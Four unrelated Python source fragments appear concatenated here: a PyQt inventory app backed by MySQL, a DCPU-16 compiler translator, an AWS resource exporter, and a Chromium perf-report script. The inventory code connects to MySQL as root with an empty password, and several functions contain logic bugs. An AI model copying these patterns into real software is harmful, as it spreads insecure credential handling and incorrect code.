ProductInfo = (ProductCode, ProductName, ProductQTY, ProductPrice)
NotBlank = True
for i in ProductInfo:
if (len(i) == 0):
NotBlank = False
self.msgbox = QMessageBox()
self.msgbox.setIcon(QMessageBox.Information)
self.msgbox.setText("Do not leave an empty field")
self.msgbox.setWindowTitle("Cannot add the product")
self.msgbox.show()
break
if (NotBlank):
ProductQTY = int(ProductQTY)
ProductPrice = int(ProductPrice)
connection = pymysql.connect(host='localhost',
user='root',
password='',
db='danasdb',
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor,
port=3306)
with connection.cursor() as cursor:
result = cursor.execute('select * from products where product_code = %s;', (ProductCode))
if (result == 1):
self.msgbox = QMessageBox()
self.msgbox.setIcon(QMessageBox.Information)
self.msgbox.setText("Product already exist!")
self.msgbox.setWindowTitle("Cannot add the product")
self.msgbox.show()
else:
connection = pymysql.connect(host='localhost',
user='root',
password='',
db='danasdb',
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor,
port=3306)
with connection.cursor() as cursor:
cursor.execute('insert into products values(%s,%s,%s,%s);',
(ProductCode, ProductName, ProductQTY, ProductPrice))
connection.commit()
self.msgbox = QMessageBox()
self.msgbox.setIcon(QMessageBox.Information)
self.msgbox.setText("Successfully added")
self.msgbox.setWindowTitle("Cannot add the product")
self.msgbox.show()
# -----------------------END OF Function for Adding Products to the Database----------------------
class Viewproducts(QWidget):
def __init__(self):
super().__init__()
self.title = 'PRODUCTS LIST' # Window Title
self.initUI()
def initUI(self):
self.setWindowTitle(self.title)
self.setGeometry(260, 100, 600, 525) # Window Size
self.setStyleSheet(
'QPushButton,QLabel,QLineEdit {font: 10pt Doppio One}') # Changes Font for Whole Window for QPushButton, QLabel, and QlineEdit
self.setFixedSize(self.size())
self.setWindowIcon(QIcon(r'C:\Users\XcomPh\Desktop\New folder (2)\ProjectDanas\Media Files\winicon.png'))
# Background
self.BackgroundHolder = QLabel(self)
self.Background = QPixmap(r'C:\Users\XcomPh\Desktop\New folder (2)\ProjectDanas\Media Files\winbackground.png')
self.BackgroundHolder.setPixmap(self.Background)
self.BackgroundHolder.move(0, 0)
self.BackgroundHolder.resize(795, 525)
self.BackgroundHolder.setScaledContents(True)
# Connects Python to Mysql
connection = pymysql.connect(host='localhost',
user='root',
password='',
db='danasdb',
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor,
port=3306)
with connection.cursor() as cursor:
numberofproducts = cursor.execute(
'SELECT * from products;') # Counts the Number of Students in that group and section
cursor.execute('SELECT * from products;') # Select each products
# Creates the product table
self.tableWidget = QTableWidget()
self.tableWidget.setRowCount(10)
self.tableWidget.setColumnCount(4)
self.tableWidget.setEditTriggers(QAbstractItemView.NoEditTriggers) # Makes the table non-editable
self.tableWidget.verticalHeader().setVisible(False) # Hides Vertical Headers
self.tableWidget.setHorizontalHeaderLabels(
['product_code', 'product_name', 'product_qty', 'product_price']) # Set Horizontal Header Labels
self.tableWidget.setMaximumWidth(450)
self.tableWidget.setMaximumHeight(300)
self.layout = QVBoxLayout()
self.layout.addWidget(self.tableWidget)
self.setLayout(self.layout)
# ---Transfer information from DB to GUI---------------
for i in range(numberofproducts):
productinfo = cursor.fetchone()
self.tableWidget.setItem(i, 0, QTableWidgetItem('{}'.format(productinfo['product_code'])))
self.tableWidget.setItem(i, 1, QTableWidgetItem('{}'.format(productinfo['product_name'])))
self.tableWidget.setItem(i, 2, QTableWidgetItem('{}'.format(productinfo['product_qty'])))
self.tableWidget.setItem(i, 3, QTableWidgetItem('{}'.format(productinfo['product_price'])))
self.show()
if __name__ | |
<filename>cc/translator.py
from cc.ast import *
from cc.parser import Parser
from .assembler import *
class Translator:
"""
Will translate the AST into DCPU16 code
We use the ABI asm specified here:
https://github.com/0x10cStandardsCommittee/0x10c-Standards/blob/master/ABI/ABI%20draft%202.txt
"""
def __init__(self, ast):
self._ast = ast # type: Parser
self._asm = Assembler()
# Function compilation state
self._regs = [Reg.I, Reg.Z, Reg.Y, Reg.X, Reg.C, Reg.B, Reg.A]
self._to_restore = []
self._save_on_call = []
self._return_pos = []
self._stack = 0
self._params = []
self._vars = []
# For break and continue
self._cond_label = []
self._end_label = []
def clear(self):
"""
Clear the compilation state
"""
self._regs = [Reg.I, Reg.Z, Reg.Y, Reg.X, Reg.C, Reg.B, Reg.A]
self._to_restore.clear()
self._save_on_call.clear()
self._return_pos.clear()
self._stack = 0
self._params.clear()
self._vars.clear()
def _can_resolve_to_operand_without_deref(self, expr):
if isinstance(expr, ExprNumber):
return True
elif isinstance(expr, ExprComma):
return self._can_resolve_to_operand_without_deref(expr.exprs[-1])
elif isinstance(expr, ExprIdent):
typ = expr.resolve_type(self._ast)
# These are resolved to a pointer on the stack so we can resolve them to an operand
if isinstance(typ, CArray) or isinstance(typ, CStruct):
return True
elif isinstance(expr.ident, VariableIdentifier) and isinstance(self._get_var(expr.ident.index), Reg):
# If this is a variable which is inside a register it will not need a deref
return True
elif isinstance(expr.ident, ParameterIdentifier) and isinstance(self._get_param(expr.ident.index), Reg):
# If this is a parameter which is inside a register it will not need a deref
return True
else:
return False
elif isinstance(expr, ExprBinary):
if self._can_resolve_to_operand_without_deref(expr.left) and self._can_resolve_to_operand_without_deref(expr.right):
left = self._translate_expr(expr.left, None)
right = self._translate_expr(expr.right, None)
if isinstance(left, Offset) and isinstance(right, int) or \
isinstance(right, Offset) and isinstance(left, int):
return True
else:
return False
elif isinstance(expr, ExprCast):
return self._can_resolve_to_operand_without_deref(expr.expr)
elif isinstance(expr, ExprAddrof):
return True
def _can_resolve_to_operand(self, expr):
if self._can_resolve_to_operand_without_deref(expr):
return True
elif isinstance(expr, ExprBinary):
if self._can_resolve_to_operand_without_deref(expr.left) and self._can_resolve_to_operand_without_deref(expr.right):
left = self._translate_expr(expr.left, None)
right = self._translate_expr(expr.right, None)
if isinstance(left, Offset) and isinstance(right, int) or \
isinstance(right, Offset) and isinstance(left, int) or \
isinstance(left, Reg) and isinstance(right, int) and expr.op in '-+' or \
isinstance(right, Reg) and isinstance(left, int) and expr.op in '-+':
return True
else:
return False
elif isinstance(expr, ExprCast):
return self._can_resolve_to_operand(expr.expr)
elif isinstance(expr, ExprIdent):
return True
elif isinstance(expr, ExprComma):
return self._can_resolve_to_operand(expr.exprs[-1])
elif isinstance(expr, ExprDeref):
if self._can_resolve_to_operand_without_deref(expr.expr):
return True
return False
def _get_param(self, i):
return self._params[i]
def _get_var(self, i):
return self._vars[i]
def _alloc_scratch(self):
if len(self._regs) == 0:
# if out of registers allocate a scratch on the stack
return self._alloca(2)
else:
reg = self._regs.pop()
if reg in [Reg.J, Reg.Z, Reg.Y, Reg.X] and reg not in self._to_restore:
self._to_restore.append(reg)
if reg in [Reg.A, Reg.B, Reg.C] and reg not in self._save_on_call:
self._save_on_call.append(reg)
return reg
def _free_scratch(self, reg: Reg):
if isinstance(reg, Offset):
# If this is a spilled register then append it
# to the start of the list, so it will have least
# priority on allocation
self._regs.insert(0, reg)
else:
# TODO: put A, B and C first to allocation
self._regs.append(reg)
# Remove from caller saved registers if in it
if reg in self._save_on_call:
self._save_on_call.remove(reg)
def _set_scratch(self, reg: Reg):
# force uses are not put in the restore or save on regcall
# the function is supposed to make sure it will all work
if reg in self._regs:
self._regs.remove(reg)
def _alloca(self, size):
self._stack += size
return Offset(Reg.J, -self._stack)
def get_instructions(self):
return self._asm.get_instructions()
def translate(self):
for func in self._ast.func_list:
if func.prototype:
# Declare asm an external symbol
self._asm.put_instruction(f'.extern {func.name}')
else:
self._translate_function(func)
for var in self._ast.global_vars:
# TODO: support constant value for global vars
if var.storage == StorageClass.EXTERN:
# Declare as an external symbol
self._asm.put_instruction(f'.extern {var.ident.name}')
else:
# Declare asm a global symbol if not a static variable
if var.storage != StorageClass.STATIC:
self._asm.put_instruction(f'.global {var.ident.name}')
self._asm.mark_label(f'{var.ident.name}')
if var.value is not None:
# Has a value!
if isinstance(var.value, int):
self._asm.emit_word(var.value)
else:
assert False, f'got {var.value}'
else:
# Does not have a value, reset to 0
for i in range(var.typ.sizeof()):
self._asm.emit_word(0)
def _translate_function(self, func: Function):
# TODO: static functions
# Clear and set the current function
self.clear()
self._ast.func = func
# label
self._asm.put_instruction('')
if func.storage_decl != StorageClass.STATIC:
self._asm.put_instruction(f'.global {func.name}')
self._asm.mark_label(func.name)
# Function entry frame
self._asm.emit_set(Push(), Reg.J)
self._asm.emit_set(Reg.J, Reg.SP)
# setup function argument position
if func.type.callconv == CallConv.STACKCALL:
# For stack call all regs are passed on the stack
off = 2
for param in func.type.param_types:
sz = param.sizeof()
self._params.append(Offset(Reg.J, off))
off += sz
elif func.type.callconv == CallConv.REGCALL:
# For regcall the first free parameters are in A, B and C
# The rest are passed on the stack
regs = [Reg.C, Reg.B, Reg.A]
off = 2
for param in func.type.param_types:
if len(regs) != 0:
r = regs.pop()
self._set_scratch(r)
self._params.append(r)
else:
sz = param.sizeof()
self._params.append(Offset(Reg.J, off))
off += sz
else:
assert False
# Set up local vars
if len(func.vars) != 0:
for var in func.vars:
if var.storage == StorageClass.AUTO:
loc = self._alloca(var.typ.sizeof())
elif var.storage == StorageClass.REGISTER:
# Can only do this for register sized stuff
if (isinstance(var.typ, CInteger) and var.typ.bits == 16) or \
isinstance(var.typ, CPointer) or \
isinstance(var.typ, CFunction):
loc = self._alloc_scratch()
else:
loc = self._alloca(var.typ.sizeof())
elif var.storage == StorageClass.STATIC:
# TODO: This is just a global variable
assert False
else:
assert False
self._vars.append(loc)
# Store place for locals
locals_pos = self._asm.get_pos()
self._asm.put_instruction(f';; Locals allocation here')
# space for saving local regs
# (X, Y, Z, I)
for i in range(4):
self._asm.put_instruction(';; For callee saved stuff')
# Translate function
self._translate_expr(func.code, None)
# Push callee saved and allocate stack area
# also generate the end code that reverts all of that
self._asm.set_pos(locals_pos)
if self._stack > 0:
self._asm.emit_sub(Reg.SP, self._stack)
for reg in self._to_restore:
self._asm.emit_set(Push(), reg)
# Create all the function frame ends
for pos in self._return_pos:
self._asm.set_pos(pos)
for reg in self._to_restore[::-1]:
self._asm.emit_set(reg, Pop())
self._asm.emit_set(Reg.SP, Reg.J)
self._asm.emit_set(Reg.J, Pop())
self._asm.emit_set(Reg.PC, Pop())
def _translate_expr(self, expr: Expr, dest):
if isinstance(expr, ExprNumber):
if dest is None:
return expr.value
else:
self._asm.emit_set(dest, expr.value)
elif isinstance(expr, ExprBreak):
self._asm.emit_set(Reg.PC, self._end_label[-1])
elif isinstance(expr, ExprContinue):
self._asm.emit_set(Reg.PC, self._cond_label[-1])
elif isinstance(expr, ExprLoop):
assert dest is None
end_lbl = self._asm.make_label()
self._end_label.append(end_lbl)
# The condition
cond_lbl = self._asm.make_and_mark_label()
self._cond_label.append(cond_lbl)
if self._can_resolve_to_operand(expr.cond):
cond_result = self._translate_expr(expr.cond, None)
else:
cond_result = self._alloc_scratch()
self._translate_expr(expr.cond, cond_result)
self._asm.emit_ife(cond_result, 0)
self._asm.emit_set(Reg.PC, end_lbl)
if not self._can_resolve_to_operand(expr.cond):
self._free_scratch(cond_result)
# The body
self._translate_expr(expr.body, None)
self._asm.emit_set(Reg.PC, cond_lbl)
# Mark the end
self._asm.mark_label(end_lbl)
elif isinstance(expr, ExprBinary):
print(f'{expr}')
# Setup the type
typ = expr.resolve_type(self._ast)
if isinstance(typ, CInteger):
assert typ.bits == 16, "Only 16bit math is natively supported"
elif isinstance(typ, CPointer) or isinstance(typ, CArray):
typ = CInteger(16, False)
else:
assert False, f'`{typ}` ({type(typ)})'
if dest is None:
# Sometimes we can find && because of `if`
if expr.op == '&&':
end = self._asm.make_label()
# Run the first part, jump to end if the result is 0
if self._can_resolve_to_operand(expr.left):
reg = self._translate_expr(expr.left, None)
self._asm.emit_ife(reg, 0)
self._asm.emit_set(Reg.PC, end)
else:
reg = self._alloc_scratch()
self._translate_expr(expr.left, reg)
self._asm.emit_ife(reg, 0)
self._asm.emit_set(Reg.PC, end)
self._free_scratch(reg)
self._translate_expr(expr.right, None)
self._asm.mark_label(end)
else:
# This allows for doing maths on operands at compile time
left = self._translate_expr(expr.left, None)
right = self._translate_expr(expr.right, None)
if isinstance(left, Offset) and isinstance(right, int):
return Offset(left.a, eval(f'{left.offset} {expr.op} {right}'))
elif isinstance(right, Offset) and isinstance(left, int):
return Offset(right.a, eval(f'{right.offset} {expr.op} {left}'))
elif isinstance(left, Reg) and isinstance(right, int):
return Offset(left, right if expr.op == '+' else -right)
elif isinstance(right, Reg) and isinstance(left, int):
return Offset(right, left if expr.op == '+' else -left)
else:
assert False, f'`{expr}` -> `{left}` and `{right}`'
else:
if expr.op in '+-*/%&|^':
# For these it is worth more to eval to the dest
# Translate the left side on the result register
self._translate_expr(expr.left, dest)
# Translate the right to a temp one
if self._can_resolve_to_operand(expr.right):
reg = self._translate_expr(expr.right, None)
else:
reg = self._alloc_scratch()
self._translate_expr(expr.right, reg)
# Emit the addition, with dest asm the destination
if expr.op == '+':
self._asm.emit_add(dest, reg)
elif expr.op == '-':
self._asm.emit_sub(dest, reg)
elif expr.op == '*':
self._asm.emit_mul(dest, reg)
elif expr.op == '/':
if typ.signed:
self._asm.emit_dvi(dest, reg)
else:
self._asm.emit_div(dest, reg)
elif expr.op == '%':
if typ.signed:
self._asm.emit_mdi(dest, reg)
else:
self._asm.emit_mod(dest, reg)
elif expr.op == '&':
self._asm.emit_and(dest, reg)
elif expr.op == '|':
self._asm.emit_bor(dest, reg)
elif expr.op == '^':
self._asm.emit_xor(dest, reg)
else:
assert False
elif expr.op in ['==']:
# For these we should just allocate another register
self._alloc_scratch()
else:
assert False
| |
<reponame>zlish12/aws-inventory
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import argparse
import sys
import os
import logging
import boto3
import xlsxwriter
import datetime
from aws_exporter import __version__
from pprint import pprint
from prettytable import PrettyTable
__author__ = "Zlish"
__copyright__ = "Zlish"
__license__ = "mit"
_logger = logging.getLogger(__name__)
def get_platform(instance):
platform = instance.platform
if platform is None:
return ('Linux')
def get_security_groups(instance):
for group in instance.security_groups:
return group['GroupName']
def get_security_groups_id(instance):
for groupid in instance.security_groups:
return groupid['GroupId']
def get_instance_name(instance):
for tag in instance.tags:
if 'Name' in tag['Key']:
return tag['Value']
def run_s3(args):
# Create an S3 client
s3 = boto3.client('s3')
s3info = {}
attributes_s3 = ['Bucket name']
# Call S3 to list current buckets
response = s3.list_buckets()
# Get a list of all bucket names from the response
for bucket in response['Buckets']:
buckets = bucket['Name']
s3info[buckets] = {
'Bucket name': bucket['Name'],
}
t = PrettyTable(attributes_s3)
t.add_row([buckets])
print(t)
if args.xlsx:
export_s3_xlsx(s3info, attributes_s3, args)
def export_s3_xlsx(s3info, attributes_s3, args):
print("\n\nExporting following results to excel spreadsheet")
print("--------------------------------------")
print(",".join(attributes_s3))
print("")
# Allow user to input own file_name
file_name = args.file_name
if args.file_name is None:
print("""
Must enter file name
--file_name <file_name>
""")
# Creates worksheet with user input
workbook = xlsxwriter.Workbook(file_name)
worksheet = workbook.add_worksheet('S3')
# Add a bold format to use to highlight cells.
bold = workbook.add_format({'bold': 1})
# Adjust the column width.
width = len("long text hidden test-1")
worksheet.set_column(0, 1, width)
worksheet.set_column(9, 1, width)
# Write data headers.
worksheet.write('A1', 'Bucket name', bold)
# Start from the first cell. Rows and columns are zero indexed
row = 1
col = 0
# Iterate over data and write it out row by row
for buckets, bucket in s3info.items():
worksheet.write(row, col, buckets)
row += 1
workbook.close()
def run_iam(args):
# Create IAM client
iam = boto3.client('iam')
iaminfo = {}
attributes_iam = ['User name', 'User ID', 'ARN']
for user in iam.list_users()['Users']:
user_name = user['UserName']
iaminfo[user_name] = {
'User name': user_name,
'User ID': user['UserId'],
'ARN': user['Arn'],
}
t = PrettyTable(attributes_iam)
t.add_row([user_name, user['UserId'], user['Arn']])
print(t)
if args.xlsx:
export_iam_xlsx(iaminfo, attributes_iam, args)
def export_iam_xlsx (iaminfo, attributes_iam, args):
print("\n\nExporting following results to excel spreadsheet")
print("--------------------------------------")
print(",".join(attributes_iam))
print("")
# Allow user to input own file_name
file_name = args.file_name
if args.file_name is None:
print("""
Must enter file name
--file_name <file_name>
""")
# Creates worksheet with user input
workbook = xlsxwriter.Workbook(file_name)
worksheet = workbook.add_worksheet('IAM')
# Add a bold format to use to highlight cells.
bold = workbook.add_format({'bold': 1})
# Adjust the column width.
width = len("long text hidden test-1")
worksheet.set_column(0, 1, width)
worksheet.set_column(9, 1, width)
# Write data headers.
worksheet.write('A1', '<NAME>', bold)
worksheet.write('B1', '<NAME>', bold)
worksheet.write('C1', 'ARN', bold)
# Start from the first cell. Rows and columns are zero indexed
row = 1
col = 0
# Iterate over data and write it out row by row
for user_name, user in iaminfo.items():
worksheet.write(row, col, user_name )
worksheet.write(row, col + 1, user['<NAME>'] )
worksheet.write(row, col + 2, user['ARN'] )
row += 1
workbook.close()
def run_vpc(args):
client = boto3.client('ec2')
vpcs = client.describe_vpcs()['Vpcs']
subnets = client.describe_subnets()['Subnets']
vpcinfo = {}
attributes_vpc = ['Vpc Id', 'CIDR', 'State', 'Subnets']
for vpc in vpcs:
vpc_id = vpc['VpcId']
subnets = []
for subnet in subnets:
subnets.append(subnet['SubnetId'])
vpcinfo[vpc_id] = {
'Vpc Id': vpc_id,
'CIDR': vpc['CidrBlock'],
'State': vpc['State'],
'Subnet Id': subnets,
}
t = PrettyTable(attributes_vpc)
t.add_row([vpc_id, vpc['CidrBlock'], vpc['State'], subnets])
print(t)
if args.xlsx:
export_vpc_xlsx(vpcinfo, attributes_vpc, args)
def export_vpc_xlsx (vpcinfo, attributes_vpc, args):
print("\n\nExporting following results to excel spreadsheet")
print("--------------------------------------")
print(",".join(attributes_vpc))
print("")
# Allow user to input own file_name
file_name = args.file_name
if args.file_name is None:
print("""
Must enter file name
--file_name <file_name>
""")
# Creates worksheet with user input
workbook = xlsxwriter.Workbook(file_name)
worksheet = workbook.add_worksheet('VPC')
# Add a bold format to use to highlight cells.
bold = workbook.add_format({'bold': 1})
# Adjust the column width.
worksheet.set_column(0, 1, 18)
worksheet.set_column(9, 1, 15)
# Write data headers.
worksheet.write('A1', 'Vpc Id', bold)
worksheet.write('B1', 'CIDR', bold)
worksheet.write('C1', 'State', bold)
worksheet.write('D1', 'Subnet Id', bold)
# Start from the first cell. Rows and columns are zero indexed
row = 1
col = 0
# Iterate over data and write it out row by row
for vpc_id, vpc in vpcinfo.items():
worksheet.write(row, col, vpc_id )
worksheet.write(row, col + 1, vpc['CIDR'] )
worksheet.write(row, col + 2, vpc['State'] )
worksheet.write_row(row, col + 3, vpc['Subnet Id'] )
row += 1
workbook.close()
def all_regions(args):
client = boto3.client('ec2')
regions = client.describe_regions()['Regions']
# Connect to EC2
for region in regions:
ec2 = boto3.resource('ec2',region_name=region['RegionName'])
# Get information for all running instances
running_instances = ec2.instances.filter(Filters=[{
'Name': 'instance-state-name',
'Values': ['running', 'stopped']}])
ec2info = {}
for instance in running_instances:
for tag in instance.tags:
if 'Name'in tag['Key']:
name = tag['Value']
# Add instance info to a dictionary
ec2info[instance.id] = {
'Region': region['RegionName'],
'Name': name,
'Instance ID': instance.id,
'Type': instance.instance_type,
'Platform': get_platform(instance),
'Security Group Name': get_security_groups(instance),
'Security Group ID': get_security_groups_id(instance),
'State': instance.state['Name'],
}
attributes = ['Region', 'Name', 'Instance ID', 'Type', 'Platform', 'Security Group Name', 'Security Group ID', 'State']
t = PrettyTable(attributes)
for instance_id, instance in ec2info.items():
t.add_row([instance['Region'], instance['Name'], instance_id,
instance['Type'], instance['Platform'], instance['Security Group Name'], instance['Security Group ID'], instance['State']])
print(t)
def run_ec2(args):
session = boto3.Session(
aws_access_key_id=args.access_key,
aws_secret_access_key=args.secret_key,
)
ec2 = session.resource('ec2')
# Get information for all running instances
running_instances = ec2.instances.filter(Filters=[{
'Name': 'instance-state-name',
'Values': ['running', 'stopped']}])
ec2info = {}
attributes_ec2 = ['Region', 'Name', 'Instance ID', 'Type', 'Platform', 'Security Group Name', 'Security Group ID', 'State']
for instance in running_instances:
# Add instance info to a dictionary
ec2info[instance.id] = {
'Region': instance.placement['AvailabilityZone'],
'Name': get_instance_name(instance),
'Instance ID': instance.id,
'Type': instance.instance_type,
'Platform': get_platform(instance),
'Security Group Name': get_security_groups(instance),
'Security Group ID': get_security_groups_id(instance),
'State': instance.state['Name'],
}
# Print results to stdout
t = PrettyTable(attributes_ec2)
for instance_id, instance in ec2info.items():
t.add_row([instance['Region'], instance['Name'], instance_id,
instance['Type'], instance['Platform'], instance['Security Group Name'], instance['Security Group ID'], instance['State']])
print(t)
if args.all_regions:
all_regions(args)
if args.xlsx:
export_ec2_xlsx(ec2info, attributes_ec2, args)
def export_ec2_xlsx(ec2info, attributes_ec2, args):
print("\n\nExporting following results to excel spreadsheet")
print("--------------------------------------")
print(",".join(attributes_ec2))
print("")
# Allow user to input own file_name
file_name = args.file_name
if args.file_name is None:
print("""
Must enter file name
--file_name <file_name>
""")
# Creates worksheet with user input
workbook = xlsxwriter.Workbook(file_name)
worksheet = workbook.add_worksheet('EC2')
# Add a bold format to use to highlight cells.
bold = workbook.add_format({'bold': 1})
# Adjust the column width.
worksheet.set_column(0, 1, 18)
worksheet.set_column(9, 1, 15)
# Write ec2 data headers.
worksheet.write('A1', 'Region', bold)
worksheet.write('B1', 'Name', bold)
worksheet.write('C1', 'Instance ID', bold)
worksheet.write('D1', 'Type', bold)
worksheet.write('E1', 'Platform', bold)
worksheet.write('F1', 'Security Group Name', bold)
worksheet.write('G1', 'Security Group ID', bold)
worksheet.write('H1', 'State', bold)
# Start from the first cell. Rows and columns are zero indexed
row = 1
col = 0
# Iterate over data and write it out row by row
# Table output for ec2 command
for instance_id, instance in ec2info.items():
worksheet.write(row, col, instance['Region'] )
worksheet.write(row, col + 1, instance['Name'] )
worksheet.write(row, col + 2, instance_id )
worksheet.write(row, col + 3, instance['Type'] )
worksheet.write(row, col + 4, instance['Platform'] )
worksheet.write(row, col + 5, instance['Security Group Name'])
worksheet.write(row, col + 6, instance['Security Group ID'] )
worksheet.write(row, col + 7, instance['State'] )
row += 1
workbook.close()
def parse_args(args):
"""Parse command line parameters
Args:
args ([str]): command line parameters as list of strings
Returns:
:obj:`argparse.Namespace`: command line parameters namespace
"""
parser = argparse.ArgumentParser(
description="AWS Exporter Tool")
parser.add_argument(
dest="aws_service_name",
help="AWS Service Name i.e. ec2, s3, elb")
parser.add_argument(
'--version',
action='version',
version='aws-exporter {ver}'.format(ver=__version__))
parser.add_argument(
'-access_key',
'--access_key',
dest="access_key",
help="AWS Access Key ID")
parser.add_argument(
'-secret_key',
'--secret_key',
dest="secret_key",
help="AWS Secret Key ID")
parser.add_argument(
'-region',
'--region',
dest="region",
help="AWS Region",
default='us-west-1')
parser.add_argument(
'-all_regions',
'--all_regions',
help="Outputs all AWS Regions",
action='store_true')
parser.add_argument(
'-xlsx',
'--xlsx',
help="Export to excel spreadsheet",
action='store_true')
parser.add_argument(
'-v',
'--verbose',
dest="loglevel",
help="set loglevel to INFO",
action='store_const',
const=logging.INFO)
parser.add_argument(
'-vv',
'--very-verbose',
dest="loglevel",
help="set loglevel to DEBUG",
action='store_const',
const=logging.DEBUG)
parser.add_argument(
'-file_name',
'--file_name',
dest="file_name",
help="Exports output to file",)
return parser.parse_args(args)
def setup_logging(loglevel):
"""Setup basic logging
Args:
loglevel (int): minimum loglevel for emitting messages
"""
logformat = "[%(asctime)s] %(levelname)s:%(name)s:%(message)s"
logging.basicConfig(level=loglevel, stream=sys.stdout,
format=logformat, datefmt="%Y-%m-%d %H:%M:%S")
def | |
<filename>tools/fuchsia/comparative_tester/generate_perf_report.py
#!/usr/bin/env python3
# Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""generate_perf_report.py is to be used after comparative_tester.py has been
executed and written some test data into the location specified by
target_spec.py. It writes to results_dir and reads all present test info from
raw_data_dir. Using this script should just be a matter of invoking it from
chromium/src while raw test data exists in raw_data_dir."""
import json
import logging
import math
import os
import sys
from typing import List, Dict, Set, Tuple, Optional, Any, TypeVar, Callable
import target_spec
from test_results import (TargetResult, ReadTargetFromJson, TestResult,
ResultLine)
class LineStats(object):
def __init__(self, desc: str, unit: str, time_avg: float, time_dev: float,
cv: float, samples: int) -> None:
"""A corpus of stats about a particular line from a given test's output.
Args:
desc (str): Descriptive text of the line in question.
unit (str): The units of measure that the line's result is in.
time_avg (float): The average measurement.
time_dev (float): The standard deviation of the measurement.
cv (float): The coefficient of variance of the measure.
samples (int): The number of samples that went into making this object.
"""
self.desc = desc
self.time_avg = time_avg
self.time_dev = time_dev
self.cv = cv
self.unit = unit
self.sample_num = samples
def ToString(self) -> str:
"""Converts the line to a human-readable string."""
if self.sample_num > 1:
return "{}: {:.5f} σ={:.5f} {} with n={} cv={}".format(
self.desc, self.time_avg, self.time_dev, self.unit, self.sample_num,
self.cv)
else:
return "{}: {:.5f} with only one sample".format(self.desc, self.time_avg)
def LineFromList(lines: List[ResultLine]) -> LineStats:
"""Takes a list of ResultLines and generates statistics for them.
Args:
lines (List[ResultLine]): The list of lines to generate stats for.
Returns:
LineStats: the representation of statistical data for the lines.
"""
desc = lines[0].desc
unit = lines[0].unit
times = [line.meas for line in lines]
avg, dev, cv = GenStats(times)
return LineStats(desc, unit, avg, dev, cv, len(lines))
class TestStats(object):
def __init__(self, name: str, time_avg: float, time_dev: float, cv: float,
samples: int, lines: List[LineStats]) -> None:
"""Represents a summary of relevant statistics for a list of tests.
Args:
name (str): The name of the test whose runs are being averaged.
time_avg (float): The average time to execute the test.
time_dev (float): The standard deviation in the mean.
cv (float): The coefficient of variance of the population.
samples (int): The number of samples in the population
lines (List[LineStats]): The averaged list of all the lines of output that
comprises this test.
"""
self.name = name
self.time_avg = time_avg
self.time_dev = time_dev
self.cv = cv
self.sample_num = samples
self.lines = lines
def ToLines(self) -> List[str]:
"""The stats of this test, as well as its constituent LineStats, in a human-
readable format.
Returns:
List[str]: The human-readable list of lines.
"""
lines = []
if self.sample_num > 1:
lines.append("{}: {:.5f} σ={:.5f}ms with n={} cv={}".format(
self.name, self.time_avg, self.time_dev, self.sample_num, self.cv))
else:
lines.append("{}: {:.5f} with only one sample".format(
self.name, self.time_avg))
for line in self.lines:
lines.append(" {}".format(line.ToString()))
return lines
def TestFromList(tests: List[TestResult]) -> TestStats:
"""Coalesces a list of TestResults into a single TestStats object.
Args:
tests (List[TestResult]): The input sample of the tests.
Returns:
TestStats: A representation of the statistics of the tests.
"""
name = tests[0].name
avg, dev, cv = GenStats([test.time for test in tests])
lines = {} # type: Dict[str, List[ResultLine]]
for test in tests:
assert test.name == name
for line in test.lines:
if not line.desc in lines:
lines[line.desc] = [line]
else:
lines[line.desc].append(line)
test_lines = []
for _, line_list in lines.items():
stat_line = LineFromList(line_list)
if stat_line:
test_lines.append(stat_line)
return TestStats(name, avg, dev, cv, len(tests), test_lines)
class TargetStats(object):
def __init__(self, name: str, samples: int, tests: List[TestStats]) -> None:
"""A representation of the actual target that was built and run on the
platforms multiple times to generate statistical data.
Args:
name (str): The name of the target that was built and run.
samples (int): The number of times the tests were run.
tests (List[TestStats]): The statistics of tests included in the target.
"""
self.name = name
self.sample_num = samples
self.tests = tests
def ToLines(self) -> List[str]:
"""Converts the entire target into a list of lines in human-readable format.
Returns:
List[str]: The human-readable test lines.
"""
lines = []
if self.sample_num > 1:
lines.append("{}: ".format(self.name))
else:
lines.append("{}: with only one sample".format(self.name))
for test in self.tests:
for line in test.ToLines():
lines.append(" {}".format(line))
return lines
def __format__(self, format_spec):
return "\n".join(self.ToLines())
def TargetFromList(results: List[TargetResult]) -> TargetStats:
"""Coalesces a list of TargetResults into a single collection of stats.
Args:
results (List[TargetResult]): The sampling of target executions to generate
stats for.
Returns:
TargetStats: The body of stats for the sample given.
"""
name = results[0].name
sample_num = len(results)
tests = {} # type: Dict[str, List[TestResult]]
for result in results:
assert result.name == name
# This groups tests by name so that they can be considered independently,
# so that in the event tests flake out, their average times can
# still be accurately calculated
for test in result.tests:
if not test.name in tests.keys():
tests[test.name] = [test]
tests[test.name].append(test)
test_stats = [TestFromList(test_list) for _, test_list in tests.items()]
return TargetStats(name, sample_num, test_stats)
def GenStats(corpus: List[float]) -> Tuple[float, float, float]:
"""Generates statistics from a list of values
Args:
corpus (List[float]): The set of data to generate statistics for.
Returns:
Tuple[float, float, float]: The mean, standard deviation, and coefficient of
variation for the given sample data.
"""
avg = sum(corpus) / len(corpus)
adjusted_sum = 0.0
for item in corpus:
adjusted = item - avg
adjusted_sum += adjusted * adjusted
dev = math.sqrt(adjusted_sum / len(corpus))
cv = dev / avg
return avg, dev, cv
def DirectoryStats(directory: str) -> List[TargetStats]:
"""Takes a path to directory, and uses JSON files in that directory to compile
a list of statistical objects for each independent test target it can detect
in the directory.
Args:
directory (str): The directory to scan for relevant JSONs
Returns:
List[TargetStats]: Each element in this list is one target, averaged up over
all of its executions.
"""
resultMap = {} # type: Dict[str, List[TargetResult]]
for file in os.listdir(directory):
results = ReadTargetFromJson("{}/{}".format(directory, file))
if not results.name in resultMap.keys():
resultMap[results.name] = [results]
else:
resultMap[results.name].append(results)
targets = []
for _, resultList in resultMap.items():
targets.append(TargetFromList(resultList))
return targets
def CompareTargets(linux: TargetStats, fuchsia: TargetStats) -> Dict[str, Any]:
"""Compare takes a corpus of statistics from both Fuchsia and Linux, and then
lines up the values, compares them to each other, and writes them into a
dictionary that can be JSONified.
"""
if linux and fuchsia:
assert linux.name == fuchsia.name
paired_tests = ZipListsByPredicate(linux.tests, fuchsia.tests,
lambda test: test.name)
